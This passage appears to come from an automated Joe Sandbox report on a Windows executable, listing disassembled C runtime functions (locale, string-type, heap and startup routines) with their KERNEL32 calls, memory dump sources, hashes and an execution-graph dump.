                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: Value$AddressHandleModuleProc
                                                                          • String ID: DecodePointer$KERNEL32.DLL
                                                                          • API String ID: 1929421221-629428536
                                                                          • Opcode ID: 78d704f0b01d2fa124798ed9f34915b70f5fd83a067686b694fd37dbd5329038
                                                                          • Instruction ID: 08c95b873346592452ec198b62b8eb65f69a5b9cf074c9e8490f285ddb83ce75
                                                                          • Opcode Fuzzy Hash: 78d704f0b01d2fa124798ed9f34915b70f5fd83a067686b694fd37dbd5329038
                                                                          • Instruction Fuzzy Hash: 01F06830240915BB9B91ABA9EC44D9A3BD99F57360B148131FA18D61A0DF38DD42CBA1
                                                                          Function 000A5E28 Relevance: 9.2, APIs: 6, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,000A926C,00000001,?,00000100,?,?,?,?,?,000A6012,00000000,?,?,?,?), ref: 000A5E57
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,000A6012,00000000,?,?,?,?,?,?,?,?,00000000), ref: 000A5E69
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,?,?,?,?,000A6012,00000000,?,?), ref: 000A5ECE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 000A5F38
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000A5F46
                                                                          • GetStringTypeA.KERNEL32(?,?,?,?,?,00000100,?,?,?,?,?,000A6012,00000000,?,?,?), ref: 000A5FBB
                                                                            • Part of subcall function 000A6B63: GetCPInfo.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,000A6012,00000000,?,?,?,?,?), ref: 000A6BAE
                                                                            • Part of subcall function 000A6B63: GetCPInfo.KERNEL32(?,00000001,?,?,?,?,000A6012,00000000,?), ref: 000A6BC7
                                                                            • Part of subcall function 000A6B63: MultiByteToWideChar.KERNEL32(?,00000001,?,000A6012,?,00000000,?,?,?,?,?,?,?,000A6012,00000000,?), ref: 000A6C74
                                                                            • Part of subcall function 000A6B63: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,000A6012), ref: 000A6C8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$StringType$Info$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2250435928-0
                                                                          • Opcode ID: 6c5a62855ccc5a2739785861e0877fdd460204c3fee357660e0dc7f1b933be77
                                                                          • Instruction ID: a38f5f8b98a3d167835b18fa60ece7b386726ce02d96df1150ac2223c98f2292
                                                                          • Opcode Fuzzy Hash: 6c5a62855ccc5a2739785861e0877fdd460204c3fee357660e0dc7f1b933be77
                                                                          • Instruction Fuzzy Hash: 06518F7150090AEFDF609FA4DC81DAE7BE9FB1A352B244435FA05C7151E735CDA08BA0
                                                                          Function 000A1DDE Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 000A1DF3
                                                                            • Part of subcall function 000A3730: Sleep.KERNEL32(00000000), ref: 000A3758
                                                                          • GetFileType.KERNEL32(00000040), ref: 000A1F1D
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 000A1FA7
                                                                          • GetFileType.KERNEL32(00000000), ref: 000A1FB9
                                                                          • SetHandleCount.KERNEL32 ref: 000A2011
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoSleepStartup
                                                                          • String ID:
                                                                          • API String ID: 1302456922-0
                                                                          • Opcode ID: b35666ab5707c6f447f096fbfe1b49284a5235fd8704f18faefdefdac9efb2d4
                                                                          • Instruction ID: c84eb84d9773cdb4431d42e28f52df3c07c5c0bc851d49122bc7e4b9f7fc935a
                                                                          • Opcode Fuzzy Hash: b35666ab5707c6f447f096fbfe1b49284a5235fd8704f18faefdefdac9efb2d4
                                                                          • Instruction Fuzzy Hash: 6B7109715087818FE761CBB8D844BE9BBF0AF47324F298369D4A59B2E2C774D805CB51
                                                                          Function 000A283C Relevance: 7.6, APIs: 5, Instructions: 53timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000A2873
                                                                          • GetCurrentProcessId.KERNEL32 ref: 000A287F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000A2887
                                                                          • GetTickCount.KERNEL32 ref: 000A288F
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 000A289B
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                          • String ID:
                                                                          • API String ID: 1445889803-0
                                                                          • Opcode ID: 8fb088bb27c48dcf10b5b0519e1d7aa0aaaebc215fe699c70dc96c3e07e4afef
                                                                          • Instruction ID: 2a2231c75d5a6bb363fa523ef14b4ca2e3368e9755689e2e4f2d271005bf8e8e
                                                                          • Opcode Fuzzy Hash: 8fb088bb27c48dcf10b5b0519e1d7aa0aaaebc215fe699c70dc96c3e07e4afef
                                                                          • Instruction Fuzzy Hash: 6C118E32E016249BEB609BF8DD48A9EB7F8FF4A391F524821F901E7210DF389D048791
                                                                          Function 000A21A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsFree.KERNEL32(0000000C,000A2616), ref: 000A21D3
                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,000A2616), ref: 000A298C
                                                                          • DeleteCriticalSection.KERNEL32(0000000C,KERNEL32.DLL,?,000A2616), ref: 000A29B6
                                                                            • Part of subcall function 000A20F9: TlsGetValue.KERNEL32(00000000,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6,?), ref: 000A210B
                                                                            • Part of subcall function 000A20F9: TlsGetValue.KERNEL32(00000005,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6,?), ref: 000A2122
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalDeleteSectionValue$Free
                                                                          • String ID: KERNEL32.DLL
                                                                          • API String ID: 3936257031-2576044830
                                                                          • Opcode ID: 9a4729379eb95b6e823a652e1d320b2c0179308e5f39b3e7b9123da5a59797cc
                                                                          • Instruction ID: 352134a869757f72a1918bfb1bafa751f357d387df8f5e8d37c88bb7d0f926fa
                                                                          • Opcode Fuzzy Hash: 9a4729379eb95b6e823a652e1d320b2c0179308e5f39b3e7b9123da5a59797cc
                                                                          • Instruction Fuzzy Hash: 4101B531940A0067D2745BACAC85A6673D8EB57731B25073DE8B9D31F1C739DC86C662
                                                                          Function 000A143A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,?,000A1472,?,?,000A54EE,000000FF,0000001E,?,000A36FC,?,00000001,?,?,000A2A2A,00000018), ref: 000A1444
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000A1454
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 1646373207-1276376045
                                                                          • Opcode ID: 1ecbc09ab091c486bf7cd89f5e841cc4b47897c95982fc9350a8dfecc3d2d324
                                                                          • Instruction ID: ddcb79027f07daac3362a899aa9230542bc5f5499b6c4746a5cc13924de37b56
                                                                          • Opcode Fuzzy Hash: 1ecbc09ab091c486bf7cd89f5e841cc4b47897c95982fc9350a8dfecc3d2d324
                                                                          • Instruction Fuzzy Hash: E9D012303407857BEBE01BF6EC4DD563A9DAB87B54708C014B62CD5060DE75C9159765
                                                                          Function 000A569D Relevance: 6.4, APIs: 5, Instructions: 181COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 000A54B5: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,000A36FC,?,00000001,?,?,000A2A2A,00000018,000A94C8,0000000C,000A2ABB), ref: 000A552C
                                                                          • GetLastError.KERNEL32(?,000A2D01,00000000,00000010,?,?,?,000A2D8D,?,000A94E8,0000000C,000A2DB9,?,?,000A151B,000A2058), ref: 000A5818
                                                                          • GetLastError.KERNEL32(?,000A2D01,00000000,00000010,?,?,?,000A2D8D,?,000A94E8,0000000C,000A2DB9,?,?,000A151B,000A2058), ref: 000A58A5
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 917199402-0
                                                                          • Opcode ID: eace65ae90dc9429abcc99f986793113f78e34ba56d45795a32b0ed66d5cb5d8
                                                                          • Instruction ID: f5ef1ff19d27244443f6a64393cadd919674848cb8fdce6ebfdaaa0e6cdd3a71
                                                                          • Opcode Fuzzy Hash: eace65ae90dc9429abcc99f986793113f78e34ba56d45795a32b0ed66d5cb5d8
                                                                          • Instruction Fuzzy Hash: 01512671C04E14DFDF616BF4AC45AAE76A4FF537A2B204125F850BB292EF388D008B90
                                                                          Function 000A492A Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,-00000010,77E85D90,00000000,000A4E8A,77E85D90,?,00000000), ref: 000A4951
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,77E85D90,00000000,000A4E8A,77E85D90,?,00000000), ref: 000A4987
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 000A49A1
                                                                          • HeapFree.KERNEL32(00000000,?), ref: 000A49B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: 2fcef7e2ee497497b8b7b7bc9ed56899bd3371cb763a560a63b0f9236eab3884
                                                                          • Instruction ID: a35ce4dde92fef872c2466d9348cdaa734a13cf6da97d513147c24f714cb6bed
                                                                          • Opcode Fuzzy Hash: 2fcef7e2ee497497b8b7b7bc9ed56899bd3371cb763a560a63b0f9236eab3884
                                                                          • Instruction Fuzzy Hash: 3011A032504B00AFE7A14F64EC05A1B7BF1F7DB7607208A19F6A6E31F2D3B4A8548B10

                                                                          Execution Graph

                                                                          Execution Coverage:6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:1042
                                                                          Total number of Limit Nodes:29
                                                                          execution_graph 3947 f122e 3950 f18fe 3947->3950 3951 f22cc 66 API calls 3950->3951 3952 f123f 3951->3952 3877 f458d 3880 f29c6 LeaveCriticalSection 3877->3880 3879 f4594 3880->3879 3985 f67c8 RtlUnwind 3986 f4247 3996 f41cb 3986->3996 3989 f4272 3990 f10cc 5 API calls 3989->3990 3992 f442a 3990->3992 3991 f42b6 IsValidCodePage 3991->3989 3993 f42c8 GetCPInfo 3991->3993 3993->3989 3994 f42db 3993->3994 4003 f3f0d GetCPInfo 3994->4003 4013 f4144 3996->4013 3999 f41ea GetOEMCP 4002 f41fa 3999->4002 4000 f4208 4001 f420d GetACP 4000->4001 4000->4002 4001->4002 4002->3989 4002->3991 4002->3994 4004 f3ff3 4003->4004 4006 f3f41 4003->4006 4009 f10cc 5 API calls 4004->4009 4224 f5fe2 4006->4224 4011 f409e 4009->4011 4011->3994 4012 f6415 101 API calls 4012->4004 4014 f41a4 4013->4014 4015 f4157 4013->4015 4014->3999 4014->4000 4016 f2345 66 API calls 4015->4016 4017 f415c 4016->4017 4019 f4184 4017->4019 4021 f3e04 4017->4021 4019->4014 4036 f40a0 4019->4036 4022 f3e10 4021->4022 4023 f2345 66 API calls 4022->4023 4024 f3e15 4023->4024 4025 f3e43 4024->4025 4027 f3e27 4024->4027 4026 f2aa0 66 API calls 4025->4026 4028 f3e4a 4026->4028 4029 f2345 66 API calls 4027->4029 4052 f3dc6 4028->4052 4031 f3e2c 4029->4031 4033 f3e3a 4031->4033 4035 f1411 66 API calls 4031->4035 4033->4019 4035->4033 4037 f40ac 4036->4037 4038 f2345 66 API calls 4037->4038 4039 f40b1 4038->4039 4040 f2aa0 66 API calls 4039->4040 4041 f40c3 4039->4041 4042 f40e1 4040->4042 4044 f40d1 4041->4044 4048 f1411 66 API calls 4041->4048 4043 f412a 4042->4043 4045 f40f8 InterlockedDecrement 4042->4045 4046 f4112 InterlockedIncrement 4042->4046 4220 f413b 4043->4220 4044->4014 4045->4046 4049 f4103 4045->4049 4046->4043 4048->4044 4049->4046 4050 f35ee 66 API calls 4049->4050 4051 f4111 4050->4051 4051->4046 4053 f3dca 4052->4053 4054 f3dfc 4052->4054 4053->4054 4055 f3c9e 8 API calls 4053->4055 4060 f3e6e 4054->4060 4056 f3ddd 4055->4056 4056->4054 4063 f3d2d 4056->4063 4219 f29c6 LeaveCriticalSection 4060->4219 4062 f3e75 4062->4031 4064 f3d3e InterlockedDecrement 4063->4064 4065 f3dc1 4063->4065 4066 f3d56 4064->4066 4067 f3d53 InterlockedDecrement 4064->4067 4065->4054 4077 f3b55 4065->4077 4068 f3d63 4066->4068 4069 f3d60 InterlockedDecrement 4066->4069 4067->4066 4070 f3d6d InterlockedDecrement 4068->4070 4071 f3d70 4068->4071 4069->4068 4070->4071 4072 f3d7a InterlockedDecrement 4071->4072 4074 f3d7d 4071->4074 4072->4074 4073 f3d96 InterlockedDecrement 4073->4074 4074->4073 4075 f3da6 InterlockedDecrement 4074->4075 4076 f3db1 InterlockedDecrement 4074->4076 4075->4074 4076->4065 4078 f3bd9 4077->4078 4081 f3b6c 4077->4081 4079 f35ee 66 API calls 4078->4079 4080 f3c26 4078->4080 4083 f3bfa 4079->4083 4103 f3c4d 4080->4103 4131 f5ae1 4080->4131 4081->4078 4087 f35ee 66 API calls 4081->4087 4089 f3ba0 4081->4089 4085 f35ee 66 API calls 4083->4085 4090 f3c0d 4085->4090 4086 f35ee 66 API calls 4086->4103 4092 f3b95 4087->4092 4088 f3c92 4093 f35ee 66 API calls 4088->4093 4094 f35ee 66 API calls 4089->4094 4106 f3bc1 4089->4106 4095 f35ee 66 API calls 4090->4095 4091 f35ee 66 API calls 4097 f3bce 4091->4097 4107 f5cbb 4092->4107 4100 f3c98 4093->4100 4101 f3bb6 4094->4101 4102 f3c1b 4095->4102 4096 f35ee 66 API calls 4096->4103 4098 f35ee 66 API calls 4097->4098 4098->4078 4100->4054 4123 f5c76 4101->4123 4105 f35ee 66 API calls 4102->4105 4103->4088 4103->4096 4105->4080 4106->4091 4108 f5cc8 4107->4108 4122 f5d45 4107->4122 4109 f5cd9 4108->4109 4110 f35ee 66 API calls 4108->4110 4111 f5ceb 4109->4111 4113 f35ee 66 API calls 4109->4113 4110->4109 4112 f5cfd 4111->4112 4114 f35ee 66 API calls 4111->4114 4115 f35ee 66 API calls 4112->4115 4117 f5d0f 4112->4117 4113->4111 4114->4112 4115->4117 4116 f5d21 4119 f5d33 4116->4119 4120 f35ee 66 API calls 4116->4120 4117->4116 4118 f35ee 66 API calls 4117->4118 4118->4116 4121 f35ee 66 API calls 4119->4121 4119->4122 4120->4119 4121->4122 4122->4089 4124 f5c83 4123->4124 4130 f5cb7 4123->4130 4125 f5c93 4124->4125 4126 f35ee 66 API calls 4124->4126 4127 f5ca5 4125->4127 4128 f35ee 66 API calls 4125->4128 4126->4125 4129 f35ee 66 API calls 4127->4129 4127->4130 4128->4127 4129->4130 4130->4106 4132 f5af2 4131->4132 4218 f3c46 4131->4218 4133 f35ee 66 API calls 4132->4133 4134 f5afa 4133->4134 4135 f35ee 66 API calls 4134->4135 4136 f5b02 4135->4136 4137 f35ee 66 API calls 4136->4137 4138 f5b0a 4137->4138 4139 f35ee 66 API calls 4138->4139 4140 f5b12 4139->4140 4141 f35ee 66 API calls 4140->4141 4142 f5b1a 4141->4142 4143 f35ee 66 API calls 4142->4143 4144 f5b22 4143->4144 4145 f35ee 66 API calls 4144->4145 4146 f5b29 4145->4146 4147 f35ee 66 API calls 4146->4147 4148 f5b31 4147->4148 4149 f35ee 66 API calls 4148->4149 4150 f5b39 4149->4150 4151 f35ee 66 API calls 4150->4151 4152 f5b41 4151->4152 4153 f35ee 66 API calls 4152->4153 4154 f5b49 4153->4154 4155 f35ee 66 API calls 4154->4155 4156 f5b51 4155->4156 4157 f35ee 66 API calls 4156->4157 4158 f5b59 4157->4158 4159 f35ee 66 API calls 4158->4159 4160 f5b61 4159->4160 4161 f35ee 66 API calls 4160->4161 4162 f5b69 4161->4162 4163 f35ee 66 API calls 4162->4163 4164 f5b71 4163->4164 4165 f35ee 66 API calls 4164->4165 4166 f5b7c 4165->4166 4167 f35ee 66 API calls 4166->4167 4168 f5b84 4167->4168 4169 f35ee 66 API calls 4168->4169 4170 f5b8c 4169->4170 4171 f35ee 66 API calls 4170->4171 4172 f5b94 4171->4172 4173 f35ee 66 API calls 4172->4173 4174 f5b9c 4173->4174 4175 f35ee 66 API calls 4174->4175 4176 f5ba4 4175->4176 4177 f35ee 66 API calls 4176->4177 4178 f5bac 4177->4178 4179 f35ee 66 API calls 4178->4179 4180 f5bb4 4179->4180 4181 f35ee 66 API calls 4180->4181 4182 f5bbc 4181->4182 4183 f35ee 66 API calls 4182->4183 4184 f5bc4 4183->4184 4185 f35ee 66 API calls 4184->4185 4186 f5bcc 4185->4186 4187 f35ee 66 API calls 4186->4187 4188 f5bd4 4187->4188 4189 f35ee 66 API calls 4188->4189 4190 f5bdc 4189->4190 4191 f35ee 66 API calls 4190->4191 4192 f5be4 4191->4192 4193 f35ee 66 API calls 4192->4193 4194 f5bec 4193->4194 4195 f35ee 66 API calls 4194->4195 4196 f5bf4 4195->4196 4197 f35ee 66 API calls 4196->4197 4198 f5c02 4197->4198 4199 f35ee 66 API calls 4198->4199 4200 f5c0d 4199->4200 4201 f35ee 66 API calls 4200->4201 4202 f5c18 4201->4202 4203 f35ee 66 API calls 4202->4203 4204 f5c23 4203->4204 4205 f35ee 66 API calls 4204->4205 4206 f5c2e 4205->4206 4207 f35ee 66 API calls 4206->4207 4208 f5c39 4207->4208 4209 f35ee 66 API calls 4208->4209 4210 f5c44 4209->4210 4211 f35ee 66 API calls 4210->4211 4212 f5c4f 4211->4212 4213 f35ee 66 API calls 4212->4213 4214 f5c5a 4213->4214 4215 f35ee 66 API calls 4214->4215 4216 f5c65 4215->4216 4217 f35ee 66 API calls 4216->4217 4217->4218 4218->4086 4219->4062 4223 f29c6 LeaveCriticalSection 4220->4223 4222 f4142 4222->4041 4223->4222 4225 f4144 76 API calls 4224->4225 4226 f5ff5 4225->4226 4234 f5e28 4226->4234 4229 f6415 4230 f4144 76 API calls 4229->4230 4231 f6428 4230->4231 4322 f6070 4231->4322 4235 f5e49 GetStringTypeW 4234->4235 4236 f5e74 4234->4236 4237 f5e69 GetLastError 4235->4237 4238 f5e61 4235->4238 4236->4238 4239 f5f5b 4236->4239 4237->4236 4240 f5ead MultiByteToWideChar 4238->4240 4257 f5f55 4238->4257 4262 f6b1a GetLocaleInfoA 4239->4262 4245 f5eda 4240->4245 4240->4257 4242 f10cc 5 API calls 4244 f3fae 4242->4244 4244->4229 4248 f5eef 4245->4248 4249 f54b5 66 API calls 4245->4249 4246 f5fac GetStringTypeA 4247 f5fc7 4246->4247 4246->4257 4252 f35ee 66 API calls 4247->4252 4251 f5f28 MultiByteToWideChar 4248->4251 4248->4257 4249->4248 4254 f5f4f 4251->4254 4255 f5f3e GetStringTypeW 4251->4255 4252->4257 4258 f5446 4254->4258 4255->4254 4257->4242 4259 f5463 4258->4259 4260 f5452 4258->4260 4259->4257 4260->4259 4261 f35ee 66 API calls 4260->4261 4261->4259 4263 f6b4d 4262->4263 4264 f6b48 4262->4264 4293 f6b04 4263->4293 4266 f10cc 5 API calls 4264->4266 4267 f5f7f 4266->4267 4267->4246 4267->4257 4268 f6b63 4267->4268 4269 f6ba3 GetCPInfo 4268->4269 4274 f6c2d 4268->4274 4270 f6bba 4269->4270 4271 f6c18 MultiByteToWideChar 4269->4271 4270->4271 4272 f6bc0 GetCPInfo 4270->4272 4271->4274 4277 f6bd3 4271->4277 4272->4271 4275 f6bcd 4272->4275 4273 f10cc 5 API calls 4276 f5fa0 4273->4276 4274->4273 4275->4271 4275->4277 4276->4246 4276->4257 4278 f54b5 66 API calls 4277->4278 4279 f6c05 4277->4279 4278->4279 4279->4274 4280 f6c62 MultiByteToWideChar 4279->4280 4281 f6c7a 4280->4281 4282 f6c99 4280->4282 4284 f6c9e 4281->4284 4285 f6c81 WideCharToMultiByte 4281->4285 4283 f5446 66 API calls 4282->4283 4283->4274 4286 f6cbd 4284->4286 4287 f6ca9 WideCharToMultiByte 4284->4287 4285->4282 4288 f3730 66 API calls 4286->4288 4287->4282 4287->4286 4289 f6cc5 4288->4289 4289->4282 4290 f6cce WideCharToMultiByte 4289->4290 4290->4282 4291 f6ce0 4290->4291 4292 f35ee 66 API calls 4291->4292 4292->4282 4296 f6f7a 4293->4296 4297 f6f93 4296->4297 4300 f6d4b 4297->4300 4301 f4144 76 API calls 4300->4301 4304 f6d60 4301->4304 4302 f6d72 4303 f2c72 66 API calls 4302->4303 4305 f6d77 4303->4305 4304->4302 4308 f6daf 4304->4308 4306 f2c0a 6 API calls 4305->4306 4311 f6b15 4306->4311 4310 f6df4 4308->4310 4312 f69e5 4308->4312 4309 f2c72 66 API calls 4309->4311 4310->4309 4310->4311 4311->4264 4313 f4144 76 API calls 4312->4313 4314 f69f9 4313->4314 4315 f6a06 4314->4315 4319 f6acc 4314->4319 4315->4308 4318 f5fe2 90 API calls 4318->4315 4320 f4144 76 API calls 4319->4320 4321 f6a2e 4320->4321 4321->4318 4323 f60ac 4322->4323 4324 f6091 LCMapStringW 4322->4324 4326 f6106 4323->4326 4327 f62aa 4323->4327 4324->4323 4325 f60b4 GetLastError 4324->4325 4325->4323 4328 f611f MultiByteToWideChar 4326->4328 4351 f62a1 4326->4351 4329 f6b1a 90 API calls 4327->4329 4336 f614c 4328->4336 4328->4351 4331 f62d2 4329->4331 4330 f10cc 5 API calls 4332 f3fce 4330->4332 4333 f62eb 4331->4333 4334 f63c6 LCMapStringA 4331->4334 4331->4351 4332->4012 4338 f6b63 73 API calls 4333->4338 4337 f6322 4334->4337 4335 f619d MultiByteToWideChar 4339 f6298 4335->4339 4340 f61b6 LCMapStringW 4335->4340 4342 f54b5 66 API calls 4336->4342 4349 f6165 4336->4349 4341 f63ed 4337->4341 4346 f35ee 66 API calls 4337->4346 4343 f62fd 4338->4343 4344 f5446 66 API calls 4339->4344 4340->4339 4345 f61d7 4340->4345 4350 f35ee 66 API calls 4341->4350 4341->4351 4342->4349 4347 f6307 LCMapStringA 4343->4347 4343->4351 4344->4351 4348 f61e0 4345->4348 4355 f6209 4345->4355 4346->4341 4347->4337 4353 f6329 4347->4353 4348->4339 4352 f61f2 LCMapStringW 4348->4352 4349->4335 4349->4351 4350->4351 4351->4330 4352->4339 4356 f633a 4353->4356 4358 f54b5 66 API calls 4353->4358 4354 f6258 LCMapStringW 4359 f6292 4354->4359 4360 f6270 WideCharToMultiByte 4354->4360 4357 f54b5 66 API calls 4355->4357 4361 f6224 4355->4361 4356->4337 4362 f6378 LCMapStringA 4356->4362 4357->4361 4358->4356 4363 f5446 66 API calls 4359->4363 4360->4359 4361->4339 4361->4354 4364 f6398 4362->4364 4365 f6394 4362->4365 4363->4339 4367 f6b63 73 API calls 4364->4367 4368 f5446 66 API calls 4365->4368 4367->4365 4368->4337 3196 f1104 3233 f264c 3196->3233 3198 f1110 GetStartupInfoW 3199 f1133 3198->3199 3234 f261b HeapCreate 3199->3234 3202 f1183 3236 f248e GetModuleHandleW 3202->3236 3206 f1194 3270 f1dde 3206->3270 3207 f10db 66 API calls 3207->3206 3209 f11a2 3210 f11ae GetCommandLineW 3209->3210 3342 f1411 3209->3342 3285 f1d81 GetEnvironmentStringsW 